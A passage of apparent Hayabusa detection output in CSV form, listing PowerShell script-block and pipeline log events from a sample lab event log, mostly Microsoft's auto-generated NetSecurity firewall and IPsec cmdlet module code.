$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.905 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.925 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.926 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.927 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.927 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.928 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.928 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.928 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.929 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.930 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:37.930 +00:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.080 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] 